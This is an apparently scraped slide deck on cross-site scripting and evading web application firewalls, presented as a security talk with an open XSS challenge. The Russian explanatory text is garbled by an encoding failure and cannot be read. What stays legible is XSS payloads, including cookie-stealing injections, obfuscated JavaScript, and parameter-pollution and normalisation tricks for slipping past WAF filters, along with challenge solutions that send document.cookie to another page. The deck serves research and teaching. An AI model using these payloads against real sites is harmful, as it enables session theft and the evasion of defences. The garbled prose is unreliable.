![? §±§â§à§ã§ä§í§Ö §ã§Ú§Ô§ß§Ñ§ä§å§â§í §é§Ñ§ã§ä§à §à§ê§Ú§Ò§Ñ§ð§ä§ã§ñ:
¡° ? < > [ { } ] ( )
? §³§Ý§à§Ø§ß§í§Ö §ã§Ú§Ô§ß§Ñ§ä§å§â§í §Ó§ã§Ö§Ô§Õ§Ñ §ß§Ö§á§à§Ý§ß§í§Ö §Ú§Ù-§Ù§Ñ
§â§Ñ§Ù§ß§à§à§Ò§â§Ñ§Ù§Ú§ñ §Ò§â§Ñ§å§Ù§Ö§â§à§Ó §Ú §á§â§à§é.
onmouseover -> onmouseenter
? §¥§Ñ§ß§ß§í§Ö §ß§Ñ§Õ§à §ß§à§â§Þ§Ñ§Ý§Ú§Ù§à§Ó§Ñ§ä§î §á§Ö§â§Ö§Õ
§ã§Ú§Ô§ß§Ñ§ä§å§â§ß§í§Þ §Ñ§ß§Ñ§Ý§Ú§Ù§à§Þ
e\xp\re\s\s\i\o\n(alert
(1337))
WAF: §ã§Ý§à§Ø§ß§à§ã§ä§Ú §Ó §â§Ö§Ñ§Ý§Ú§Ù§Ñ§è§Ú§Ú
* §á§à§Õ§ì§Ö§Þ!](https://image.slidesharecdn.com/xssvswaf-101111135143-phpapp02/85/ONSEC-XSS-vs-waf-11-320.jpg)
![? §¦§ã§ä§î §æ§å§ß§Ü§è§Ú§à§ß§Ñ§Ý §Ó§Ö§Ò-§á§â§Ú§Ý§à§Ø§Ö§ß§Ú§ñ, §Ô§Õ§Ö WAF
§Õ§à§Ý§Ø§Ö§ß §Ò§í§ä§î §à§ä§Ü§Ý§ð§é§Ö§ß (HTML §â§Ö§Õ§Ñ§Ü§ä§à§â)
? §£§Ö§Ò-§á§â§Ú§Ý§à§Ø§Ö§ß§Ú§Ö §Þ§à§Ø§Ö§ä §Ò§í§ä§î §å§ñ§Ù§Ó§Ú§Þ§à §Õ§Ý§ñ
§æ§â§Ñ§Ô§Þ§Ö§ß§ä§Ú§â§à§Ó§Ñ§ß§ß§í§ç §Ñ§ä§Ñ§Ü
http://localhost/t.php?a=<scri&a=pt>&a=alert(1)&a=<
/scri&a=pt>
? §¯§Ñ§Õ§à §Ó§ã§ä§â§Ñ§Ú§Ó§Ñ§ä§î §Ú§ß§ä§Ö§â§á§â§Ö§ä§Ñ§ä§à§â JavaScript:
document[(![]+/./)[5]+(![]+/./)[1]+(![]+/./)[1]+String.from
CharCode(75,73)+(![]+/./)[4]]
WAF: §ã§Ý§à§Ø§ß§à§ã§ä§Ú §Ó §â§Ö§Ñ§Ý§Ú§Ù§Ñ§è§Ú§Ú
* §á§à§Õ§ì§Ö§Þ!](https://image.slidesharecdn.com/xssvswaf-101111135143-phpapp02/85/ONSEC-XSS-vs-waf-12-320.jpg)
![? Opened XSS challenge at http://onsec.ru/t.php
? WAF §æ§Ú§Ý§î§ä§â§å§Ö§ä
? , ", < , > , ( , ) , // §Ó $_GET, $_POST, $_COOKIE, $_FILE
? §£§ß§Ö§Õ§â§Ö§ß§Ú§ñ §Ó §Ü§à§Õ
? ¡°<input type='text' name='text' value=? ¡±.$_GET[?text?]. ¡° ?>¡±
? ¡°<input type='text' name='search?
value=¡°.$_POST[?search?].¡±>¡±
? ¡°<h3 onmouseover=¡°.$_GET[?aaa?].¡±>¡±
§±§â§à§Ó§Ö§Õ§Ö§Þ §ï§Ü§ã§á§Ö§â§Ú§Þ§Ö§ß§ä
* §á§à§Õ§ì§Ö§Þ!](https://image.slidesharecdn.com/xssvswaf-101111135143-phpapp02/85/ONSEC-XSS-vs-waf-15-320.jpg)
![? Opened XSS challenge at http://onsec.ru/t.php
? §²§Ö§ê§Ö§ß§Ú§ñ §à§ä oRB [rdot.org]
/t.php?aaa=document.location.href=[document.referrer,docu
ment.cookie]
/t.php?aaa=document.location=[/javascript:1/.source,location
.pathname,location.hash]#/;alert(document.cookie);
? §²§Ö§ê§Ö§ß§Ú§Ö §à§ä asddas [rdot.org]
/t.php?aaa=document.location.href=document.forms[0].text.v
alue&text=http:google.com
§±§â§à§Ó§Ö§Õ§Ö§Þ §ï§Ü§ã§á§Ö§â§Ú§Þ§Ö§ß§ä
* §á§à§Õ§ì§Ö§Þ!](https://image.slidesharecdn.com/xssvswaf-101111135143-phpapp02/85/ONSEC-XSS-vs-waf-16-320.jpg)
![? Opened XSS challenge at http://onsec.ru/t.php
? §²§Ö§ê§Ö§ß§Ú§Ö §à§ä §£§Ý§Ñ§Õ§Ñ §²§à§ã§Ü§à§Ó§Ñ [vos.uz]
/t.php?aaa=document.all[5][window.name]=location.hash#
<input style=width:100%;height:100%;
onmouseover="alert(document.cookie)">
? §³§Ñ§Þ§à§Ö §ï§Ý§Ö§Ô§Ñ§ß§ä§ß§à§Ö §â§Ö§ê§Ö§ß§Ú§Ö §à§ä Ruben Ventura [thr3w]
/t.php?aaa=location.href=%26quot;javascript:alertu0028/XS
S/.sourceu0029%26quot;
§±§â§à§Ó§Ö§Õ§Ö§Þ §ï§Ü§ã§á§Ö§â§Ú§Þ§Ö§ß§ä
* §á§à§Õ§ì§Ö§Þ!](https://image.slidesharecdn.com/xssvswaf-101111135143-phpapp02/85/ONSEC-XSS-vs-waf-17-320.jpg)
[ONSEC ]XSS vs waf
- 1. XSS vs WAF Best practice
- 2. ? §®§Ö§Ø§ã§Ñ§Û§ä§à§Ó§à§Ö §Ó§í§á§à§Ý§ß§Ö§ß§Ú§Ö §ã§è§Ö§ß§Ñ§â§Ú§Ö§Ó ? §®§à§Ø§Ö§ä §Ò§í§ä§î §Ú§ã§á§à§Ý§î§Ù§à§Ó§Ñ§ß§à §Ù§Ý§à§å§Þ§í§ê§Ý§Ö§ß§ß§Ú§Ü§à§Þ §Õ§Ý§ñ §á§à§Ý§å§é§Ö§ß§Ú§ñ §Õ§Ñ§ß§ß§í§ç (cookie, DOM, etc), §á§â§à§Ó§Ö§Õ§Ö§ß§Ú§ñ §Õ§â§å§Ô§Ú§ç §Ñ§ä§Ñ§Ü (CSRF, SPAM). ? §¬§Ý§Ñ§ã§ã§Ú§é§Ö§ã§Ü§Ú§Û §á§â§Ú§Þ§Ö§â: <input type=text value=¡°¡±><script>alert(document.cookie)</script>¡±> XSS: Cross Site Scripting * §Þ§à§Ø§ß§à §ã§á§Ñ§ä§î
- 3. ? Reflected (non-persistent) ¨C §à§ä§â§Ñ§Ø§Ö§ß§ß§í§Ö. §°§ä§Ó§Ö§ä §ã§Ö§â§Ó§Ö§â§Ñ §ã§à§Õ§Ö§â§Ø§Ú§ä §Õ§Ñ§ß§ß§í§Ö §Ú§Ù §Ù§Ñ§á§â§à§ã§Ñ. ? Stored (persistent) ¨C §ç§â§Ñ§ß§Ú§Þ§í§Ö. §°§ä§Ó§Ö§ä §ã§Ö§â§Ó§Ö§â§Ñ §ã§à§Õ§Ö§â§Ø§Ú§ä §Õ§Ñ§ß§ß§í§Ö, §Ó§ß§Ö§Õ§â§Ö§ß§ß§í§Ö §â§Ñ§ß§Ö§Ö. ? DOM based ¨C §Õ§Ú§ß§Ñ§Þ§Ú§é§Ö§ã§Ü§Ú§Ö. §³§ä§â§Ñ§ß§Ú§è§Ñ §ß§Ñ §Ü§Ý§Ú§Ö§ß§ä§ã§Ü§à§Û §ã§ä§à§â§à§ß§Ö §Õ§Ú§ß§Ñ§Þ§Ú§é§Ö§ã§Ü§Ú §Þ§à§Ø§Ö§ä §Ò§í§ä§î §Ú§Ù§Þ§Ö§ß§Ö§ß§Ñ §Õ§Ñ§ß§ß§í§Þ§Ú §Ù§Ñ§á§â§à§ã§Ñ. XSS: §®§Ö§Ø§Õ§å§ß§Ñ§â§à§Õ§ß§Ñ§ñ §Ü§Ý§Ñ§ã§ã§Ú§æ§Ú§Ü§Ñ§è§Ú§ñ * §Þ§à§Ø§ß§à §ã§á§Ñ§ä§î
- 4. ? §£§ß§Ö§Õ§â§Ö§ß§Ú§Ö §ä§ï§Ô§Ñ: <input type=text value=><script>alert(1337)</script> ? §£§ß§Ö§Õ§â§Ö§ß§Ú§Ö §Ñ§ä§â§Ú§Ò§å§ä§Ñ: <a href=?http://cmc.msu.su? onclick=alert(1337) a=??> ? §£§ß§Ö§Õ§â§Ö§ß§Ú§Ö §Ó §Ñ§Ü§ä§Ú§Ó§ß§à§Ö §ã§à§Õ§Ö§â§Ø§Ú§Þ§à§Ö (JavaScript,SWF,PDF): if (text==?a? || alert(1337) || ??) { ? §£§ß§Ö§Õ§â§Ö§ß§Ú§Ö §Ó §Ù§Ñ§Ô§à§Ý§à§Ó§à§Ü HTTP §à§ä§Ó§Ö§ä§Ñ, §Õ§â§å§Ô§à§Ö: Location: javascript:alert(1) - miXSS XSS: §´§Ö§ç§ß§Ú§é§Ö§ã§Ü§Ñ§ñ §Ü§Ý§Ñ§ã§ã§Ú§æ§Ú§Ü§Ñ§è§Ú§ñ * §Þ§à§Ø§ß§à §ã§á§Ñ§ä§î
- 5. ? Tyler Reguly, nCircle at 06.04.2010 miXSS: meta information XSS * §Þ§à§Ø§ß§à §á§â§à§ã§ß§å§ä§î§ã§ñ
- 6. ? §´§â§Ö§Ò§å§ð§ë§Ú§Ö §Õ§Ö§Û§ã§ä§Ó§Ú§Û §á§à§Ý§î§Ù§à§Ó§Ñ§ä§Ö§Ý§ñ: <a href=?a? onmouseover=alert(1337) style=?font- size:500px?> ? §¡§Ó§ä§à§ß§à§Þ§ß§í§Ö: <input type=text value=a onfocus=alert(1337) AUTOFOCUS> XSS: §¬§Ý§Ñ§ã§ã§Ú§æ§Ú§Ü§Ñ§è§Ú§ñ §á§à §â§Ö§Ñ§Ý§Ú§Ù§Ñ§è§Ú§Ú * §Þ§à§Ø§ß§à §ã§á§Ñ§ä§î
- 7. ? Twitter 21.09.2010: http://twitter.com/nn#@"onmouseover="alert(1337);"/ ? Youtube 04.07.2010: XSS: latest examples * §Þ§à§Ø§ß§à §á§â§à§ã§í§á§Ñ§ä§î§ã§ñ
- 8. ? Cross Application Scripting ? §®§ß§à§Ø§Ö§ã§ä§Ó§à GUI §á§à§ß§Ú§Þ§Ñ§Ö§ä HTML From XSS to CAS: §Ó§ã§Ö §ß§à§Ó§à§Ö ¨C §ï§ä§à.. * §Þ§à§Ø§ß§à §á§â§à§ã§ß§å§ä§î§ã§ñ http://www.backtrack-linux.org/backtrack/cross-application- scripting-all-you-kde-are-belong-to-us/
- 9. ? SMS manager: tel:/+7123213?call ? Safari: <iframe src=/slideshow/onsec-xss-vs-waf/5745052/¡°skype:/+27836712?call¡±> ? Mail manager: §±§â§Ú§Þ§Ö§â §Ù§Ñ§Ü§â§í§ä §Õ§à §å§ã§ä§â§Ñ§ß§Ö§ß§Ú§ñ §å§ñ§Ù§Ó§Ú§Þ§à§ã§ä§Ú iPhone/iPad CAS prototypes * §ß§Ñ§Õ§à §Ù§Ñ§á§à§Þ§ß§Ú§ä§î
- 10. ? §¢§Ý§à§Ü§Ú§â§å§Ö§ä §á§à§Õ§à§Ù§â§Ú§ä§Ö§Ý§î§ß§í§Û §Ù§Ñ§á§â§à§ã ? §ª§ã§á§â§Ñ§Ó§Ý§ñ§Ö§ä §á§à§Õ§à§Ù§â§Ú§ä§Ö§Ý§î§ß§í§Û §Ù§Ñ§á§â§à§ã ? §¢§Ý§à§Ü§Ú§â§å§Ö§ä §Ú§ã§ä§à§é§ß§Ú§Ü §á§à§Õ§à§Ù§â§Ú§ä§Ö§Ý§î§ß§à§Ô§à §Ù§Ñ§á§â§à§ã§Ñ ? §±§à§Õ§à§Ù§â§Ú§ä§Ö§Ý§î§ß§í§Û §á§à §ã§Ú§Ô§ß§Ñ§ä§å§â§Ñ§Þ ¨C §á§à§Õ§ç§à§Õ§Ú§ä §á§à§Õ §â§Ö§Ô. §Ó§í§â§Ñ§Ø§Ö§ß§Ú§Ö, §ä§Ú§á§Ñ: ?onmouse*?. ? §±§à§Õ§à§Ù§â§Ú§ä§Ö§Ý§î§ß§í§Û §á§à §á§â§Ñ§Ó§Ú§Ý§Ñ§Þ ¨C §Ù§Ñ§á§â§à§ã §Ò§Ö§Ù §á§â§Ö§Õ§í§ã§ä§à§â§Ú§Ú (§ã§â§Ñ§Ù§å §ß§Ñ §ã§ä§â§Ñ§ß§Ú§è§å §ã§Þ§Ö§ß§í §á§Ñ§â§à§Ý§ñ §Ò§Ö§Ù §á§à§ã§Ö§ë§Ö§ß§Ú§ñ §Ô§Ý§Ñ§Ó§ß§à§Û) WAF: Web Application Firewall * §á§à§â§Ñ §á§â§à§ã§í§á§Ñ§ä§î§ã§ñ
- 11. ? §±§â§à§ã§ä§í§Ö §ã§Ú§Ô§ß§Ñ§ä§å§â§í §é§Ñ§ã§ä§à §à§ê§Ú§Ò§Ñ§ð§ä§ã§ñ: ¡° ? < > [ { } ] ( ) ? §³§Ý§à§Ø§ß§í§Ö §ã§Ú§Ô§ß§Ñ§ä§å§â§í §Ó§ã§Ö§Ô§Õ§Ñ §ß§Ö§á§à§Ý§ß§í§Ö §Ú§Ù-§Ù§Ñ §â§Ñ§Ù§ß§à§à§Ò§â§Ñ§Ù§Ú§ñ §Ò§â§Ñ§å§Ù§Ö§â§à§Ó §Ú §á§â§à§é. onmouseover -> onmouseenter ? §¥§Ñ§ß§ß§í§Ö §ß§Ñ§Õ§à §ß§à§â§Þ§Ñ§Ý§Ú§Ù§à§Ó§Ñ§ä§î §á§Ö§â§Ö§Õ §ã§Ú§Ô§ß§Ñ§ä§å§â§ß§í§Þ §Ñ§ß§Ñ§Ý§Ú§Ù§à§Þ e\xp\re\s\s\i\o\n(alert (1337)) WAF: §ã§Ý§à§Ø§ß§à§ã§ä§Ú §Ó §â§Ö§Ñ§Ý§Ú§Ù§Ñ§è§Ú§Ú * §á§à§Õ§ì§Ö§Þ!
- 12. ? §¦§ã§ä§î §æ§å§ß§Ü§è§Ú§à§ß§Ñ§Ý §Ó§Ö§Ò-§á§â§Ú§Ý§à§Ø§Ö§ß§Ú§ñ, §Ô§Õ§Ö WAF §Õ§à§Ý§Ø§Ö§ß §Ò§í§ä§î §à§ä§Ü§Ý§ð§é§Ö§ß (HTML §â§Ö§Õ§Ñ§Ü§ä§à§â) ? §£§Ö§Ò-§á§â§Ú§Ý§à§Ø§Ö§ß§Ú§Ö §Þ§à§Ø§Ö§ä §Ò§í§ä§î §å§ñ§Ù§Ó§Ú§Þ§à §Õ§Ý§ñ §æ§â§Ñ§Ô§Þ§Ö§ß§ä§Ú§â§à§Ó§Ñ§ß§ß§í§ç §Ñ§ä§Ñ§Ü http://localhost/t.php?a=<scri&a=pt>&a=alert(1)&a=< /scri&a=pt> ? §¯§Ñ§Õ§à §Ó§ã§ä§â§Ñ§Ú§Ó§Ñ§ä§î §Ú§ß§ä§Ö§â§á§â§Ö§ä§Ñ§ä§à§â JavaScript: document[(![]+/./)[5]+(![]+/./)[1]+(![]+/./)[1]+String.from CharCode(75,73)+(![]+/./)[4]] WAF: §ã§Ý§à§Ø§ß§à§ã§ä§Ú §Ó §â§Ö§Ñ§Ý§Ú§Ù§Ñ§è§Ú§Ú * §á§à§Õ§ì§Ö§Þ!
- 13. ? §±§à§Ú§ã§Ü §ß§Ö §æ§Ú§Ý§î§ä§â§å§Ö§Þ§í§ç §Õ§Ñ§ß§ß§í§ç (_FILES, URI ¡) ? §±§à§Ú§ã§Ü §à§ê§Ú§Ò§à§Ü §Ó §ß§à§â§Þ§Ñ§Ý§Ú§Ù§Ñ§è§Ú§Ú (uni/*union*/on, u000000028) ? §±§à§Ú§ã§Ü §ß§Ö §æ§Ú§Ý§î§ä§â§å§Ö§Þ§í§ç §ã§Ú§Ô§ß§Ñ§ä§å§â ? §±§à§Ú§ã§Ü §à§ê§Ú§Ò§à§Ü §Ý§à§Ô§Ú§Ü§Ú (XSS threw white list) ? §°§ã§ä§Ñ§Ý§î§ß§í§Ö §Þ§Ö§ä§à§Õ§í HOWTO find WAF 0day ;) * §á§à§Õ§ì§Ö§Þ!
- 14. ? §±§à§á§â§à§Ò§å§Û§ä§Ö §á§â§à§Ó§Ö§â§Ú§ä§î WAF §ß§Ñ §æ§Ú§Ý§î§ä§â§Ñ§è§Ú§ð JavaScript §æ§å§ß§Ü§è§Ú§Ú setInterval() ? setInterval ¨C §Ñ§ß§Ñ§Ý§à§Ô setTimeout, §Ó§Ó§Ö§Õ§Ö§ß§ß§í§Û §Õ§Ý§ñ §ã§à§Ó§Þ§Ö§ã§ä§Ú§Þ§à§ã§ä§Ú §ã§à §ã§ä§Ñ§â§í§Þ§Ú §Ó§Ö§â§ã§Ú§ñ§Þ§Ú JavaScript ? §¿§ä§å §æ§å§ß§Ü§è§Ú§ð §á§à§é§Ö§Þ§å-§ä§à §Ù§Ñ§Ò§í§Ó§Ñ§ð§ä §Õ§à§Ò§Ñ§Ó§Ý§ñ§ä§î §Ó §ã§Ú§Ô§ß§Ñ§ä§å§â§í, §à§Ô§â§Ñ§ß§Ú§é§Ú§Ó§Ñ§ñ§ã§î §ä§à§Ý§î§Ü§à setTimeout ? §´§Ñ§Ü§Ú§ç §á§â§Ú§Þ§Ö§â§à§Ó §à§é§Ö§ß§î-§à§é§Ö§ß§î §Þ§ß§à§Ô§à, §á§à§ã§Þ§à§ä§â§Ú§ä§Ö §ç§à§ä§ñ §Ò§í §ã§á§Ú§ã§à§Ü §ã§à§Ò§í§ä§Ú§Û §ß§Ñ http://msdn.microsoft.com/en- us/library/ms533051(VS.85).aspx HOWTO find WAF 0day ;) * §á§à§Õ§ì§Ö§Þ!
- 15. ? Opened XSS challenge at http://onsec.ru/t.php ? WAF §æ§Ú§Ý§î§ä§â§å§Ö§ä ? , ", < , > , ( , ) , // §Ó $_GET, $_POST, $_COOKIE, $_FILE ? §£§ß§Ö§Õ§â§Ö§ß§Ú§ñ §Ó §Ü§à§Õ ? ¡°<input type='text' name='text' value=? ¡±.$_GET[?text?]. ¡° ?>¡± ? ¡°<input type='text' name='search? value=¡°.$_POST[?search?].¡±>¡± ? ¡°<h3 onmouseover=¡°.$_GET[?aaa?].¡±>¡± §±§â§à§Ó§Ö§Õ§Ö§Þ §ï§Ü§ã§á§Ö§â§Ú§Þ§Ö§ß§ä * §á§à§Õ§ì§Ö§Þ!
- 16. ? Opened XSS challenge at http://onsec.ru/t.php ? §²§Ö§ê§Ö§ß§Ú§ñ §à§ä oRB [rdot.org] /t.php?aaa=document.location.href=[document.referrer,docu ment.cookie] /t.php?aaa=document.location=[/javascript:1/.source,location .pathname,location.hash]#/;alert(document.cookie); ? §²§Ö§ê§Ö§ß§Ú§Ö §à§ä asddas [rdot.org] /t.php?aaa=document.location.href=document.forms[0].text.v alue&text=http:google.com §±§â§à§Ó§Ö§Õ§Ö§Þ §ï§Ü§ã§á§Ö§â§Ú§Þ§Ö§ß§ä * §á§à§Õ§ì§Ö§Þ!
- 17. ? Opened XSS challenge at http://onsec.ru/t.php ? §²§Ö§ê§Ö§ß§Ú§Ö §à§ä §£§Ý§Ñ§Õ§Ñ §²§à§ã§Ü§à§Ó§Ñ [vos.uz] /t.php?aaa=document.all[5][window.name]=location.hash# <input style=width:100%;height:100%; onmouseover="alert(document.cookie)"> ? §³§Ñ§Þ§à§Ö §ï§Ý§Ö§Ô§Ñ§ß§ä§ß§à§Ö §â§Ö§ê§Ö§ß§Ú§Ö §à§ä Ruben Ventura [thr3w] /t.php?aaa=location.href=%26quot;javascript:alertu0028/XS S/.sourceu0029%26quot; §±§â§à§Ó§Ö§Õ§Ö§Þ §ï§Ü§ã§á§Ö§â§Ú§Þ§Ö§ß§ä * §á§à§Õ§ì§Ö§Þ!
- 18. ? WAF §à§Ò§ß§Ñ§â§å§Ø§Ú§Ó§Ñ§Ö§ä §Ù§Ý§à§å§Þ§í§ê§Ý§Ö§ß§ß§Ú§Ü§Ñ ? WAF §Ù§Ñ§Ü§â§í§Ó§Ñ§Ö§ä §Ü§Ñ§Ü§Ú§Ö-§ä§à §Ó§Ö§Ü§ä§à§â§Ñ §Ñ§ä§Ñ§Ü§Ú ? WAF ¨C §ç§à§â§à§ê§Ú§Û, §ã§Õ§Ö§Ý§Ñ§Û§ä§Ö §Ö§Ô§à §Ö§ë§Ö §Ý§å§é§ê§Ö! WAF: §ä§Ñ§Ü §Ý§Ú §Ó§ã§Ö §á§Ý§à§ç§à? * §Þ§à§Ø§ß§à §ã§ß§à§Ó§Ñ §ã§á§Ñ§ä§î